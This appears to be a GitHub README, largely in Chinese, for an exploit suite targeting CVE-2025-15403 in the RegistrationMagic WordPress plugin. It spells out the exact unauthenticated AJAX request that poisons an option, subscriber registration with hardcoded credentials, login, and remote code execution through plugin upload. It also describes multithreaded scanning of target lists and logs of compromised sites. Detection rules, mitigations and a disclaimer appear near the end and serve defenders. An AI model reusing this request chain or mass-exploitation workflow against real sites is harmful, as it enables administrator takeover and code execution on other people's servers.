Nxploited/CVE-2025-15403

# CVE-2025-15403 RegistrationMagic <= 6.0.7.1 - 未认证权限提升漏洞（通过 admin_order） ## 🧠 概述 **CVE-2025-15403** 是 **CVSS 9.8 严重** 级别的 **RegistrationMagic** WordPress 插件权限提升漏洞。 该漏洞存在于插件的 `add_menu` 函数中，通过未认证的 `rm_user_exists` AJAX 动作暴露。攻击者向 `order` 参数注入 **空 slug**，并结合 `enable_admin_order=yes` 标志，可操纵插件内部菜单生成逻辑。当管理菜单随后构建时，插件会静默调用目标角色的 `add_cap('manage_options')` —— 将任何订阅者级别的账户提升至 **完整管理员权限**。 | 字段 | 详细信息 | |------------------------|---------------------------------------------------------| | **CVE ID** | CVE-2025-15403 | | **插件** | RegistrationMagic | | **标识符** | `registrationmagic` / `custom-registration-form-builder-with-submission-manager` | | **受影响版本** | 所有 **6.0.7.1** 及以下版本 | | **漏洞类型** | 未认证权限提升 | | **攻击要求** | AJAX 阶段：无。 攻击：订阅者账户 | | **攻击向量** | 网络 | | **CVSS 3.1 分数** | **9.8 严重** | | **CVSS 向量** | `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` | | **CNA** | Wordfence | | **影响** | 完整的 WordPress 管理员接管 | | **研究员** | Nxploited | ## 💀 漏洞深度分析 根本原因是 `add_menu` 函数可通过未认证的 `rm_user_exists` 访问，且对 `admin_order` 标识符缺少零值校验： ``` // Registered with no capability check add_action('wp_ajax_nopriv_rm_user_exists', [$this, 'rm_user_exists_handler']); public function rm_user_exists_handler() { $slug = sanitize_text_field($_POST['rm_slug']); $order = $_POST['order']; // ← User-controlled, NOT sanitized $role_key = /* derived from POST */; $enable = $_POST['enable_admin_order']; if ($slug === 'rm_options_admin_menu' && $enable === 'yes') { // Stores attacker-controlled order into plugin options update_option('rm_admin_order', $order); // e.g. ",menu1" → empty first slug } } // Later, when admin menu is being built... public function add_menu() { $order = get_option('rm_admin_order'); // ← Poisoned by attacker $slugs = explode(',', $order); foreach ($slugs as $slug) { if (empty($slug)) { // Empty slug triggers unconditional capability grant $role->add_cap('manage_options'); // ← FULL ADMIN CAPABILITY ADDED } } } ``` **为何此漏洞严重：** - `wp_ajax_nopriv_*` = **无需认证** 即可污染选项 - `order=` 中的空 slug 通过 `empty()` 检查，触发 `add_cap('manage_options')` - `manage_options` 是 WordPress 最高权限 —— 等同于管理员 - 任何现有订阅者账户将在下次加载管理菜单时立即获得完整管理员权限 - AJAX 阶段无需任何先期认证 —— 使整个链条的 **门槛近乎为零** ## ⚔️ 攻击链 ``` ╔══════════════════════════════════════════════════════════════════════════╗ ║ STAGE 1 — Unauthenticated Option Poisoning ║ ╚══════════════════════════════════════════════════════════════════════════╝ POST /wp-admin/admin-ajax.php action = rm_user_exists rm_slug = rm_options_admin_menu order = ,menu1 ← empty first element = empty slug _Subscriber = 1 ← target role key restore = false enable_admin_order= yes Response: HTTP 200 (any non-blocked response = option poisoned) ↓ Plugin stores order=",menu1" into wp_options ↓ Next admin menu build triggers add_cap('manage_options') on Subscriber role ╔══════════════════════════════════════════════════════════════════════════╗ ║ STAGE 2 — Account Acquisition (Subscriber) ║ ╚══════════════════════════════════════════════════════════════════════════╝ Option A — Register via the site's registration form (Mode 0): GET /wp-login.php?action=register → smart form detection POST → create subscriber account Credentials: NXploited / xplpass123 Option B — Use an existing subscriber account. ╔══════════════════════════════════════════════════════════════════════════╗ ║ STAGE 3 — Login + Capability Harvest ║ ╚══════════════════════════════════════════════════════════════════════════╝ POST /wp-login.php log = NXploited pwd = xplpass123 ↓ Subscriber account now carries manage_options → full admin panel accessible ╔══════════════════════════════════════════════════════════════════════════╗ ║ STAGE 4 — Deep Verification & RCE via Plugin Upload ║ ╚══════════════════════════════════════════════════════════════════════════╝ GET /wp-admin/ → Admin dashboard accessible ✔️ GET /wp-admin/plugin-install.php → Plugin install page accessible ✔️ POST /wp-admin/update.php?action=upload-plugin pluginzip = Nxploited.zip → Plugin uploaded & executed ✔️ GET /wp-content/plugins/Nxploited/hello.php Response contains "Nxploited" → CONFIRMED RCE ✔️ ``` ## 🎯 运行模式 此漏洞利用套件提供 **三种独立模式**，覆盖完整攻击生命周期： | 模式 | 名称 | 描述 | |------|-----------------------------|--------------------------------------------------------------------------| | `0` | **仅注册** | 智能 WordPress 表单检测 + 订阅者账户注册 | | `1` | **仅利用** | 触发未认证的 AJAX 原语以污染 `admin_order` | | `2` | **利用 + 登录 + 验证** | 完整链条：原语 → 登录 → 管理仪表盘 → 插件安装 → RCE | ## ⚙️ 依赖要求 ``` pip install requests colorama urllib3 ``` | 依赖项 | 用途 | |----------------------------|------------------------------------------------------------| | `requests` | HTTP 会话、Cookie 处理、重定向追踪 | | `colorama` | 跨平台彩色终端输出 | | `urllib3` | 自签名证书 SSL 警告抑制 | | `concurrent.futures` | 高吞吐多目标扫描的线程池 | | `zipfile` | 内存中测试插件 ZIP 生成，用于 RCE 验证 | | `html.parser` | 智能注册表单检测与字段提取 | ## 📂 文件结构 ``` CVE-2025-15403/ ├── CVE-2025-15403.py # Main exploit suite ├── list.txt # Target URLs — one per line │ ├── rm_register_results.txt # Mode 0: successful registrations ├── rm_exploit_results.txt # Mode 1 & 2: primitive fire log ├── rm_admin_verify.txt # Mode 2: login + admin verification log ├── rm_plugin_uploads.txt # Mode 2: plugin upload attempt log │ ├── rm_admin_dashboard_success.txt # ✔ Sites where admin dashboard confirmed ├── rm_plugin_install_access.txt # ✔ Sites where plugin-install page accessible └── rm_plugin_rce_success.txt # ✔ Sites where RCE via plugin upload confirmed ``` ## 🚀 使用方法 ### 步骤 1 — 准备目标 创建 `list.txt`，每行一个 URL 或主机名： ``` https://target1.com https://target2.com http://target3.com/wordpress target4.com ``` ### 步骤 2 — 运行漏洞套件 ``` python CVE-2025-15403.py ``` 系统将交互式提示所有参数。**模式 2** 的示例会话： ``` Select mode (0 = register, 1 = exploit, 2 = exploit+verify) [0]: 2 Targets list file (one host/URL per line) [list.txt]: list.txt Threads (concurrent sites) [5]: 20 HTTP timeout (seconds) [10]: 12 Role key to escalate (e.g. _Subscriber, _Editor) [_Subscriber]: _Subscriber Username to login with (e.g. NXploited) [NXploited]: NXploited Password for that user [xplpass123]: xplpass123 Output file for admin verification [rm_admin_verify.txt]: rm_admin_verify.txt Output file for plugin upload tests [rm_plugin_uploads.txt]: rm_plugin_uploads.txt Send primitive before login in mode 2? (yes/no) [yes]: yes ``` ### 步骤 3 — 监控实时输出 ``` [14:31:01] info | Mode 2: Exploit + Login + Deep Verify | Targets: 200 [14:31:02] SESSION | https://target.com | PRIM: OK | REG: SKIP | LOGIN: OK | ACCESS: admin_full_plugin_upload [14:31:03] SESSION | https://target2.com | PRIM: OK | REG: SKIP | LOGIN: FAIL | ACCESS: bad_credentials [14:31:04] SESSION | https://target3.com | PRIM: FAIL | REG: SKIP | LOGIN: - | ACCESS: NO HIT ``` | 颜色 | 标签 | 含义 | |-------------|---------|---------------------------------------------------| | 🔵 青色 | `info` | 信息 — 模式启动、配置信息 | | 🟢 绿色 | `ok` | 完整成功 — 管理员访问或 RCE 确认 | | 🟡 黄色 | `warn` | 部分结果 — 原语成功但登录失败等 | | 🔴 红色 | `err` | 严重失败 — 文件未找到、异常、拒绝访问 | ## 📊 输出文件参考 ### `rm_admin_dashboard_success.txt` 订阅者账户成功访问 `/wp-admin/` 的站点（在权限提升后）： ``` [2025-04-18 14:31:02] https://victim.com - NXploited:xplpass123 - ADMIN_DASHBOARD - verify_admin_dashboard ``` ### `rm_plugin_install_access.txt` 可访问插件安装页面的站点（确认 `manage_options` 权限）： ``` [2025-04-18 14:31:02] https://victim.com - NXploited:xplpass123 - PLUGIN_INSTALL_ACCESS=https://victim.com/wp-admin/plugin-install.php?tab=upload - plugin-install-access ``` ### `rm_plugin_rce_success.txt` 已上传并执行测试插件 —— **确认 RCE**： ``` [2025-04-18 14:31:05] https://victim.com - NXploited:xplpass123 - PLUGIN_RCE=https://victim.com/wp-content/plugins/Nxploited/hello.php - AdminUpload ``` ## 🖥️ 脚本参数参考 | 参数 | 默认值 | 描述 | |--------------------------|---------------------|--------------------------------------------------| | Mode | `0` | 攻击模式：0 = 注册，1 = 利用，2 = 完整链条 | | Targets file | `list.txt` | 包含目标 URL 的文件 | | Threads | `5`（无硬性上限） | 并发线程池工作线程数 | | Timeout | `10` 秒 | 每个请求的 HTTP 超时 | | Role key | `_Subscriber` | 要提升的 WordPress 角色（`_Editor`、`_Author` 等）| | Username | `NXploited` | 注册 / 登录使用的账户名 | | Password | `xplpass123` | 账户密码 | | Send primitive | `yes` | 在模式 2 中是否在登录前触发 AJAX 原语 | ## 🔬 验证逻辑（模式 2） 模式 2 执行 **三阶段递进验证** —— 每个阶段相互独立，并写入各自的结果文件： ``` Stage 1 — Admin Dashboard GET /wp-admin/ GET /wp-admin/index.php GET /wp-admin/users.php Check for: "dashboard", "adminmenu", "manage_options", "plugins.php" ✔ → writes to rm_admin_dashboard_success.txt Stage 2 — Plugin Install Page Access GET /wp-admin/plugin-install.php GET /wp-admin/plugin-install.php?tab=upload Check for: "upload-plugin", "plugin-upload-form", "pluginzip" ✔ → writes to rm_plugin_install_access.txt Stage 3 — Real Plugin Upload + Execution (RCE Proof) Extract _wpnonce from plugin-install page POST /wp-admin/update.php?action=upload-plugin pluginzip = Nxploited.zip (in-memory generated) GET /wp-content/plugins/Nxploited/hello.php Check response body contains "Nxploited" ✔ → writes to rm_plugin_rce_success.txt ``` 每个通过阶段都会被 **独立记录** —— 即使目标仅通过第 1 阶段但未通过第 3 阶段，也会在 `rm_admin_dashboard_success.txt` 中被捕获。 ## 🔍 智能注册引擎（模式 0） 模式 0 使用自定义 HTML 表单解析器，自动检测并提交 WordPress 注册表单 —— 包括自定义的 RegistrationMagic 表单： ``` Probe URLs (in order): /wp-login.php?action=register /register/ /signup/ /wp-signup.php /wp-login.php For each page: → Parse all

elements → Score each form (0–200 points): +100 "user_login" + "user_email" fields present + 60 Email + username-like fields present + 30 rm_* prefixed input fields (RegistrationMagic specific) + 20 form id/class contains "register" / "signup" + 10 Page body mentions "register" / "sign up" → Submit highest-scoring form (threshold: 40+) → Verify success via response body / redirect URL ``` ## 📊 检测特征 漏洞利用产生的网络特征 —— 用于防御方与 WAF/IDS 编写者： ``` POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded action=rm_user_exists&rm_slug=rm_options_admin_menu&order=%2Cmenu1&_Subscriber=1&restore=false&enable_admin_order=yes ``` **WAF / IDS 规则伪代码）：** ``` IF request.method == POST AND request.path == "/wp-admin/admin-ajax.php" AND request.body CONTAINS "rm_user_exists" AND request.body CONTAINS "rm_options_admin_menu" AND request.body CONTAINS "enable_admin_order=yes" THEN BLOCK + ALERT (Privilege Escalation Attempt — CVE-2025-15403) ``` **附加检测 — 选项污染：** ``` Monitor wp_options table: IF option_name = "rm_admin_order" AND option_value STARTS WITH "," THEN ALERT — potential CVE-2025-15403 exploitation ``` ## 🛡️ 缓解与修复 如果你是 **站点所有者、开发人员或防御者**，请立即采取行动： - ✅ **更新** RegistrationMagic 至 **6.0.7.1 以上** 版本 - ✅ **停用并删除** 该插件，直到确认已修补 - ✅ **审计** `wp_options` 表 — 检查 `rm_admin_order` 值是否存在可疑条目（如以 `,` 开头） - ✅ **审计** 所有 WordPress 用户 — 移除或降级任何拥有 `manage_options` 权限的未授权账户 - ✅ **添加权限检查** 到所有 `wp_ajax_nopriv_*` 处理程序 — 切勿在未认证情况下暴露选项写入功能 - ✅ **验证并清理** `order` 参数 — 拒绝包含空 slug 段落的值 - ✅ **阻止** 未认证 POST 请求到 `admin-ajax.php` 中包含 `rm_options_admin_menu` 的请求（在 WAF 层面） - ✅ **监控** WordPress 与服务器日志，查找来自未认证来源的 `rm_user_exists` AJAX 动作调用 ## ⚠️ 免责声明 ``` THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL, AUTHORIZED PENETRATION TESTING, AND SECURITY RESEARCH PURPOSES ONLY. By downloading, executing, or modifying this script, you explicitly agree: • You hold EXPLICIT, WRITTEN authorization from the owner of every target system you test. No exceptions. No assumptions. • You are operating within a formally scoped, authorized penetration testing engagement or a controlled lab environment you own. • You will NOT deploy this tool against any system, network, or infrastructure without documented legal permission. • Nxploited and all contributors bear ZERO liability for unauthorized use, data loss, system damage, legal proceedings, or criminal prosecution arising from the use of this tool in any form. Unauthorized use of this exploit constitutes a criminal offense under: — Computer Fraud and Abuse Act (CFAA), USA — Computer Misuse Act (CMA), UK — EU Directive 2013/40/EU on Attacks Against Information Systems — Saudi Arabia's Anti-Cyber Crime Law (No. M/17) — And all equivalent national and international cybercrime legislation. USE RESPONSIBLY. HACK ETHICALLY. DISCLOSE RESPONSIBLY. ``` ## 👤 作者

| | | |---------------|-----------------------------------------------------------| | **Handle** | Nxploited | | **Telegram** | [@KNxploited](https://t.me/KNxploited) | | **GitHub** | [github.com/Nxploited](https://github.com/Nxploited) |

_{由 Nxploited 精心构建 · 仅限授权安全研究 · CVSS 9.8 严重}

标签：add_cap, Admin Order, BurpSuite集成, CRITICAL, CVE-2025-15403, CVSS 9.8, manage_options, Privilege Escalation, RegistrationMagic, Web报告查看器, WordPress, WordPress插件, 协议分析, 威胁模拟, 安全漏洞, 插件漏洞, 未认证漏洞, 权限提升, 漏洞分析, 漏洞披露, 菜单注入, 路径探测, 逆向工具